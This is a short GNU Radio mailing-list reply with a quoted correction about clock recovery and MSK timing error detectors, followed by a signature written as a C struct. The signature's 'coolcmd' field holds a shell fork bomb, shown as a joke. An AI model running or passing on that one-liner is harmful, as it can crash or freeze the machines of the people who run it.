Thanks a lot. The brief and your email will keep me busy experimenting and learning more for quite a while.
I really appreciate it.
On 2 April 2018 at 18:56, Andy Walls <andy@silverblocksystems.net> wrote:
On Mon, 2018-04-02 at 13:44 -0400, Andy Walls wrote:
> > All PLL based symbol clock recovery blocks/methods in GNURadio
> require
> symbol centers to be peaked.
Slight correction. The MSK TED's don't require the input pulses to be
peaked, but that's because they operate on the FM'ed pulses, and not
the levels of the baseband pulses.
-Andy
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas@habets.se" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
char name[] = { "Thomas Habets" };
char email[] = { "thomas@habets.se" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
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